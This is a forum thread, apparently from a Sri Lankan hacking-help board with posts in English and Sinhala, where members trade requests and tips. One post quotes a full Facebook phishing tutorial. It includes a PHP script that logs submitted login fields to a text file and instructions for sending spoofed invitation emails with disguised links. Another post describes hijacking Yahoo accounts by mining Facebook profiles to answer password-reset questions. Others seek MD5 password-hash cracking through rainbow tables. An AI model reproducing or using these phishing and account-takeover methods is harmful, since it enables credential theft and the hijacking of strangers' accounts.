~H~A~C~K~I~N~G = ASk

silence

Member
Feb 17, 2009
81
0
0
12345 said:
Still fucking :growl::growl:


Yes, I am going to Harass you because you don't know what you're talking about and yet you act like you do, so why are you so afraid to answer my questions and prove that you are not a idiot instead of insulting me :) (oh wait, maybe because you don't know, haha)


1. What makes RSA encryption so hard to break (what's the mathematical obstacles)?
2. In a buffer overflow (stack overflow kind) attack, what memory location are you trying to overwrite?
3. If a website request has showcalendar.php?year=2000 and the output page looks a lot like the cal command, what would be a very likely exploit here?



It's been two days, for something that should have only taken 1 minute, but alas, you don't know shit about the basics of network security or hacking anything (except you know how to google around for so called hacking tutorials). Let me explain to you my friend, because that's calls being a script kiddy, for a second I thought maybe you were something more, I am disappointed.
 

ChuttaFX

Member
Nov 15, 2008
4,587
12
0
12345 said:
Ask any request in key loggers fake pages bombs

anythings ebook

tomo it will be on here

cuz nw im buzzy

oya fake page hadana wade echchara hariyanne na putha.
moda lamai nam owata ahuwei.

wena kramayak nadda? step-by-step tutorial ekak denna barida? :D
elakiri thread ekak, thanx
 

ChuttaFX

Member
Nov 15, 2008
4,587
12
0
BLACKLIST_MEMBER said:
hehe elakiri mata hambuna tut ekak onna methana dannam :D meka sira
methana meka share kaloth kachal yana ekak nae kiyala hithanawa :S


ONE!:
go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.

TWO!:
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes. you should find this
screen1pf8.png

The big red ring that circles the "action=" you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as "index.PHP" (not htm!)

THREE!:
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this:
Code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.

FOUR!:
Upload the 3 files "index.php", "next.php" and "passwords.txt" (or whatever the password file is called) to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com. When you made an account you should upload the 3 files.

Congratz. You have yourself a working Phisher site!

FIVE!:
now we would like to send spoof emails out. To do that we hav 2 go deadfake.com and create an email from noreply@facebook or something like that.

SIX!:
Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
screen2jj5.png

Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty kewl. Now i belive your ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it.
elakiri trick eka macho, okata nam mokek hari ahu karaganna puluwan sure ekata.
mama try ekak dala balanna ona. thanx. :D :D
 

ChuttaFX

Member
Nov 15, 2008
4,587
12
0
12345 said:
any help need?
vBulletin password ekaka encrypt MD5 code ekakui eke HASH ekai thiyanawa. eka decrypt karala denna puluwannda? ;) katawath karadarayak karanna neme. eka hariyana wada balaganna. :D
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
ChuttaFX said:
vBulletin password ekaka encrypt MD5 code ekakui eke HASH ekai thiyanawa. eka decrypt karala denna puluwannda? ;) katawath karadarayak karanna neme. eka hariyana wada balaganna. :D

ys can consult expertzF support team :yes: my siggy
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
silence said:
Yes, I am going to Harass you because you don't know what you're talking about and yet you act like you do, so why are you so afraid to answer my questions and prove that you are not a idiot instead of insulting me :) (oh wait, maybe because you don't know, haha)


1. What makes RSA encryption so hard to break (what's the mathematical obstacles)?
2. In a buffer overflow (stack overflow kind) attack, what memory location are you trying to overwrite?
3. If a website request has showcalendar.php?year=2000 and the output page looks a lot like the cal command, what would be a very likely exploit here?



It's been two days, for something that should have only taken 1 minute, but alas, you don't know shit about the basics of network security or hacking anything (except you know how to google around for so called hacking tutorials). Let me explain to you my friend, because that's calls being a script kiddy, for a second I thought maybe you were something more, I am disappointed.



Fuck :growl:
 

silence

Member
Feb 17, 2009
81
0
0
ChuttaFX said:
vBulletin password ekaka encrypt MD5 code ekakui eke HASH ekai thiyanawa. eka decrypt karala denna puluwannda? ;) katawath karadarayak karanna neme. eka hariyana wada balaganna. :D
Do it your self you lazy bum at http://www.freerainbowtables.com I use them pretty frequently, much nicer than maintaining your own set of rainbow tables. I'd they say can get around 75% of the md5 hash space. Also if you use their service, be considerate and give back to the community and run the client for a while so you generate some of the data as well (the more points you get back contributing back, the more hashes you can queue up at any given time).
 
Last edited:

ChuttaFX

Member
Nov 15, 2008
4,587
12
0
12345 said:
ys can consult expertzF support team :yes: my siggy
I'd posted it on a hacking forum. but they could not decrypt it. i can't do it my self coz it says that it takes more than 3years+ to decrypt da pswrd with my PC performance. :shocked: anyway, I don't wanna to die for it. it's just 4 fun n 2 improve my knowledge. :D
 

silence

Member
Feb 17, 2009
81
0
0
ChuttaFX said:
I'd posted it on a hacking forum. but they could not decrypt it. i can't do it my self coz it says that it takes more than 3years+ to decrypt da pswrd with my PC performance. :shocked: anyway, I don't wanna to die for it. it's just 4 fun n 2 improve my knowledge. :D

http://freerainbowtables.com did you even read the earlier reply I did or try the site, with them you won't be cracking it on your machine, you will submit the hash, and if there is a matching hash-key pair, the password will show up within minutes.
 

Rasly

Member
Mar 3, 2009
10
0
0
Yahoo Hacking

Yahoo hacking there has so many methods
I am her going to use Social Engineering (it is part o f CEH)
Yahoo hacking throws Social Network web side
I thing you all have Face book account
Go to face book account, fine one friend with yahoo mail ID,
In that friend profile collect this information
-----------------------------
Country
Zip code
Birthday day/date/year
----------------------------
One of information in this
Pet name
Last name of musician
Last name of teacher
Last name of best childhood friend
Born hospital
Favorite book
Favorite author
That information not in face books you need fine another ware
---------------------------
After go to yahoo mail and select Forget your ID or password?
After fill everything using already we collected information
But password will be reset, you can’t get password
 

krrishkevin

Member
Dec 1, 2006
427
4
0
In South Park
guys i found smthin cool, hthkrclb site ekata yanna.. there u cn find an easy way 2 phish.. poddak atha patha gaala hoyala balanna.. :P i can put d full name n exact link but im afraid of gettin ma EK id bannd.. :P lol .. btw man meka try kale nam nah..cuz mekath yanne spam folder 1ta..
 
Last edited:

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
krrishkevin said:
guys i found smthin cool, hthkrclb site ekata yanna.. there u cn find an easy way 2 phish.. poddak atha patha gaala hoyala balanna.. :P i can put d full name n exact link but im afraid of gettin ma EK id bannd.. :P lol .. btw man meka try kale nam nah..cuz mekath yanne spam folder 1ta..

Keep going machn ela ela


Oya inne kattiya fild eakata bahala :rofl:
 

krrishkevin

Member
Dec 1, 2006
427
4
0
In South Park
12345 said:
Keep going machn ela ela


Oya inne kattiya fild eakata bahala :rofl:

hehe :D mama nam field ekata bahala tikak kal.. but me thread eken thamai mata thibuna problem godatakata answers hoyagaththe.. :yes: :yes: u r doin a great job macho.. thawath prblems awoth ahannam :yes: :yes: :P
 

12345

Member
Dec 13, 2006
296
0
0
REST IN PEACE
krrishkevin said:
hehe :D mama nam field ekata bahala tikak kal.. but me thread eken thamai mata thibuna problem godatakata answers hoyagaththe.. :yes: :yes: u r doin a great job macho.. thawath prblems awoth ahannam :yes: :yes: :P


Ya machn sure


anytime ask me :yes: ill help u


thease days im bit of buzzy with my GSM network seen